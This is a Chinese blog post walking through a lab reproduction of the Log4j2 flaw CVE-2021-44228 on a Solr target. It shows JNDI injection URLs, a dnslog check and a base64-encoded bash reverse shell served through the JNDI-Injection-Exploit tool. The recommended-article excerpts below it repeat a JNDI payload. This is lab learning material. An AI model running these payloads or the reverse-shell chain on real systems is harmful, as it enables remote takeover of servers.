Log4j2:CVE-2021-44228漏洞复现

最新推荐文章于 2026-01-05 13:24:23 发布
原创 最新推荐文章于 2026-01-05 13:24:23 发布 · 247 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#log4j

Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。

访问靶场

121.40.158.60:8983/solr/admin/cores?action=1

漏洞判定

利用dnslog

首先访问dnslog获取一个临时域名

然后利用获取到的临时域名构造payload ,直接访问

http://121.40.158.60:8983/solr/admin/cores?action=${jndi:ldap://s98m2z.dnslog.cn}
出现访问记录

漏洞利用

使用kali虚拟机下载JDNI注入工具

构造payload

并base64编码------ bash -i > /dev/tcp/192.168.192.128/6969 0>&1

在kali执行:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguMTkyLjEyOC82OTY5IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.192.128

得到了rmi、ldap参数

监听端口

在浏览器访问payload

121.40.158.60:8983/solr/admin/cores?action=${jndi:rmi://192.168.192.128:1099/wvsnvm}

发现kali这边监听到了,可以执行shell命令

完成

Paper_F1nd
关注
vulhub log4j2 CVE-2021-44228漏洞复现
qq_65852138的博客
09-08 470
vulhub log4j2 CVE-2021-44228漏洞复现
复现apache log4j2(CVE-2021-44228)漏洞
AmeV_ll的博客
03-30 296
JNDI (Java Naming and Directory Interface) 是一组应用程序接口,它为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定位用户、网络、机器、对象和服务等各种资源。JNDI底层支持RMI远程对象,RMI注册的服务可以通过JNDI接口来访问和调用。JNDI接口在初始化时,可以将RMI URL作为参数传入,而JNDI注入就出现在客户端的lookup()函数中,如果lookup()的参数可控就可能被攻击,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程
【vulhub】Log4j2CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 4222
【vulhub】Log4j2CVE-2021-44228漏洞复现
vulhub复现CVE-2021-44228log4j漏洞
weixin_48878440的博客
12-12 1544
vulhub复现cve-2021-44228 log4j漏洞
Log4j CVE-2021-44228 漏洞复现详细教程
2201_75617121的博客
07-23 602
摘要:本文介绍了利用Log4j漏洞(CVE-2021-44228)进行攻击的完整过程。首先通过vulhub搭建漏洞环境,使用dnslog.cn验证漏洞存在。然后利用JNDI-Injection-Exploit工具生成恶意LDAP链接,构造包含base64编码反弹shell的命令。最后通过漏洞触发点执行命令,成功获取目标shell权限。文中详细说明了从环境搭建、漏洞验证到最终利用的全套流程,包括必要的编码转换和监听设置。
Log4j(CVE-2021-44228)漏洞复现及可能出现的复现问题
2301_78611138的博客
08-06 1780
log4j2是 Apache 开源的一个高性能 Java 日志框架,广泛用于企业级应用开发中,其主要功能是记录程序运行过程中的调试信息、错误日志、访问日志等。JNDI(Java Naming and Directory Interface) 是 Java 提供的一套 API,用于查找和访问命名与目录服务(如 LDAP、RMI、DNS)。攻击者可以利用 JNDI 加载远程的 Java 类(.class文件),并由目标 JVM 自动加载执行。
Log4j 2 (CVE-2021-44228)漏洞复现
Pluto.的博客
11-21 733
Log4j 2 (CVE-2021-44228)漏洞复现
CVE-2021-44228漏洞log4j漏洞复现
THZLYXX的博客
11-11 940
1.vulhub靶场启动,进入目录/home/vulhub-master/log4j/CVE-2021-44228/5.使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all注入工具生成可用payload。1.下载JNDI-Injection-Exploit-1.0-SNAPSHOT-all工具进行漏洞利用。6.使用bp进行抓包,将工具生成的payload替换到语句中,并对其进行URL编码。2.对执行的命令进行加密bash64进行加密。3.使用burp进行bash64编码。
log4j漏洞复现CVE-2021-44228
qq_42699326的博客
11-26 1138
Log4j 2 是 Apache 基金会开发的一个广泛使用的 Java 日志记录库。CVE-2021-44228 是一个严重的远程代码执行(RCE)漏洞,也被称为 Log4Shell。该漏洞允许攻击者通过构造特定的日志消息来远程执行任意代码。
log4j2 CVE-2021-44228漏洞复现
qq_14902381的博客
08-10 951
vulfocus靶场log4j2 漏洞CVE-2021-44228复现
C 标准库 - `<assert.h>`
wjs2024的博客
12-31 269
assert.h>:当expr为假时,打印错误信息并终止程序执行。:当expr为假时,在编译时打印错误信息。以下是一个使用assertint a = 10;int b = 5;// 断言a大于bprintf("程序继续执行。\n");return 0;运行上述代码时,由于a > b为真,程序将正常执行并打印“程序继续执行。<assert.h>头文件为C语言开发者提供了一种强大的工具——断言。通过使用断言,可以有效地检查代码中的错误,提高代码质量和可靠性。
阿里Java面试被问:单元测试的最佳实践
2501_94505843的博客
01-04 758
本文系统介绍了软件测试的最佳实践,主要包含以下内容:1. 测试金字塔原则,推荐70%单元测试+20%集成测试+10%端到端测试的比例;2. 测试代码质量标准,包括命名规范、AAA模式等;3. Mock与Stub的使用场景和区别;4. 测试数据管理策略;5. 断言最佳实践;6. 测试隔离与可重复性;7. 测试性能与维护建议;8. 边界条件测试方法;9. 有意义的测试覆盖率目标;10. TDD开发流程。文章提供了大量代码示例,并总结了单元测试检查清单和测试金字塔指导原则,强调应重点关注业务逻辑、复杂算法和边界条
八周Python强化计划(八)
mysterious_z的博客
01-05 491
本文介绍了Python项目优化的关键实践,包括日志记录、单元测试、调试技巧和代码规范。主要内容有: 使用logging模块替代print实现分级日志输出 通过assert编写简单测试验证代码逻辑 演示三种调试方法:print调试、日志调试和IDE断点调试 介绍PEP8代码规范及自动检查工具 提供Python不同发展方向的学习路线建议 文章还包含项目实战示例,如增强代码健壮性、支持结果输出到文件等功能优化。最后强调通过完善项目并上传GitHub来巩固学习成果,建议学习者选择一个具体方向进行深入实践。
2.6 测试
大B哥要搞艺术
01-04 646
模拟用户操作路径(如 Web 页面点击、API 调用链),验证系统整体功能。适合验证核心业务流程(如用户注册 - 登录 - 下单),但需控制用例数量(执行耗时较长)。在 Python 开发中,测试不仅是 "找 Bug" 的手段,更是保障代码质量、降低维护成本的核心工程实践。当单元测试通过后,需验证模块间交互(如 API 调用、数据库操作、第三方服务依赖)。:优先选择 pytest,语法简洁、扩展性强,是 Python 社区主流测试框架。),包含用户注册、登录功能,依赖数据库操作(丰富插件(参数化、覆盖率)
过长函数(Long Function):坏味道识别与重构实战指南
随心随手随意随记
01-04 896
重构指南:过长函数(Long Function) 摘要:过长函数是常见代码坏味道,指函数体过长、承担过多职责。典型症状包括:超过50行代码、多层嵌套、使用"and"连接多个动作、需要滚动查看完整内容。这种函数导致维护困难、bug风险高、扩展障碍和认知负担。 重构方案: 识别:检查函数是否违反单一职责原则 拆分:将不同逻辑提取为独立小函数(如验证、计算、日志等) 命名:使用描述性函数名明确职责 组合:主函数仅协调各子函数调用
淘宝式jquery图片数字切换
最新发布
01-05
下载前可以先看下教程 https://pan.quark.cn/s/a426667488ae 标题“仿淘宝jquery图片左右切换带数字”揭示了这是一个关于运用jQuery技术完成的图片轮播机制,其特色在于具备淘宝在线平台普遍存在的图片切换表现,并且在整个切换环节中会展示当前图片的序列号。 此类功能一般应用于电子商务平台的产品呈现环节,使用户可以便捷地查看多张商品的照片。 说明中的“NULL”表示未提供进一步的信息,但我们可以借助标题来揣摩若干核心的技术要点。 在构建此类功能时,开发者通常会借助以下技术手段:1. **jQuery库**:jQuery是一个应用广泛的JavaScript框架,它简化了HTML文档的遍历、事件管理、动画效果以及Ajax通信。 在此项目中,jQuery将负责处理用户的点击动作(实现左右切换),并且制造流畅的过渡效果。 2. **图片轮播扩展工具**:开发者或许会采用现成的jQuery扩展,例如Slick、Bootstrap Carousel或个性化的轮播函数,以达成图片切换的功能。 这些扩展能够辅助迅速构建功能完善的轮播模块。 3. **即时数字呈现**:展示当前图片的序列号,这需要通过JavaScript或jQuery来追踪并调整。 每当图片切换时,相应的数字也会同步更新。 4. **CSS美化**:为了达成淘宝图片切换的视觉效果,可能需要设计特定的CSS样式,涵盖图片的排列方式、过渡效果、点状指示器等。 CSS3的动画和过渡特性(如`transition`和`animation`)在此过程中扮演关键角色。 5. **事件监测**:运用jQuery的`.on()`方法来监测用户的操作,比如点击左右控制按钮或自动按时间间隔切换。 根据用户的交互,触发相应的函数来执行...
大家都觉得几点到几点妲己
01-05
大家都觉得几点到几点妲己
垃圾实例分割数据集-20251118-194020.zip
01-05
垃圾实例分割数据集 一、基础信息 • 数据集名称:垃圾实例分割数据集 • 图片数量: 训练集:7,000张图片 验证集:426张图片 测试集:644张图片 • 训练集:7,000张图片 • 验证集:426张图片 • 测试集:644张图片 • 分类类别: 垃圾(Sampah) • 垃圾(Sampah) • 标注格式:YOLO格式,包含实例分割的多边形点坐标,适用于实例分割任务。 • 数据格式:图片文件 二、适用场景 • 智能垃圾检测系统开发:数据集支持实例分割任务,帮助构建能够自动识别和分割图像中垃圾区域的AI模型,适用于智能清洁机器人、自动垃圾桶等应用。 • 环境监控与管理:集成到监控系统中,用于实时检测公共区域的垃圾堆积,辅助环境清洁和治理决策。 • 计算机视觉研究:支持实例分割算法的研究和优化,特别是在垃圾识别领域,促进AI在环保方面的创新。 • 教育与实践:可用于高校或培训机构的AI课程,作为实例分割技术的实践数据集,帮助学生理解计算机视觉应用。 三、数据集优势 • 精确的实例分割标注:每个垃圾实例都使用详细的多边形点进行标注,确保分割边界准确,提升模型训练效果。 • 数据多样性:包含多种垃圾物品实例,覆盖不同场景,增强模型的泛化能力和鲁棒性。 • 格式兼容性强:YOLO标注格式易于与主流深度学习框架集成,如YOLO系列、PyTorch等,方便研究人员和开发者使用。 • 实际应用价值:直接针对现实世界的垃圾管理需求,为自动化环保解决方案提供可靠数据支持,具有重要的社会意义。
cve-2021-44228漏洞复现分析
03-03
### CVE-2021-44228 漏洞复现分析 #### Log4j 的介绍 Log4j 是一个广泛使用的Java日志记录库,由Apache软件基金会开发。该库允许开发者通过配置文件灵活控制日志信息的格式、级别以及输出位置。 #### 漏洞概述 CVE-2021-44228是一个存在于Log4j 2.x系列中的严重远程代码执行漏洞。当应用程序使用了受影响版本的日志组件并处理特定模式字符串时,攻击者可以构造恶意输入触发JNDI注入,从而实现任意代码执行或敏感数据泄露[^1]。 #### 复现环境准备 为了安全地研究此漏洞,在隔离环境中搭建测试平台至关重要。通常情况下,这涉及到安装适当的操作系统镜像(如Kali Linux),确保已安装Java Development Kit (JDK),因为目标应用依赖于它来运行。具体来说,对于本案例而言,建议采用JDK 1.8版本[^2]。 #### 构建利用场景 构建模拟攻击的第一步是从GitHub仓库获取专门为此目的设计的工具集——`bkfish/Apache-Log4j-Learning`项目提供了详细的指南和必要的脚本支持。这些资源可以帮助研究人员快速设置好实验条件,并验证不同条件下漏洞的表现形式。 #### 利用方式实例化 一种常见的利用方法是在请求参数中嵌入特殊格式化的字符串表达式`${...}`,其中包含了指向外部LDAP服务器的数据源描述符。例如,向Solr服务发送如下所示的核心管理命令: ```bash http://target/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ib1ozt.dnslog.cn} ``` 这里`${sys:java.version}`会解析成当前系统的Java版本号作为子域名的一部分传递给DNS查询,以此证明存在潜在的安全风险[^4]。 #### 受影响范围确认 一旦成功触发漏洞,可以通过监控网络流量或者查看响应报文中携带的信息判断是否存在异常行为。比如观察到DNS请求中含有预期之外的内容,则表明可能已经遭受了非法入侵尝试;反之如果没有明显的迹象则说明防护措施有效阻止了威胁的发生。 #### 安全加固建议 针对此类高危级别的零日缺陷,官方及时发布了补丁程序修复问题所在之处。因此强烈推荐用户尽快升级至最新稳定版Log4j以消除隐患。除此之外,还应考虑采取其他辅助性的防御策略,诸如限制对外部资源加载权限、启用严格的输入校验机制等手段进一步增强安全性。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值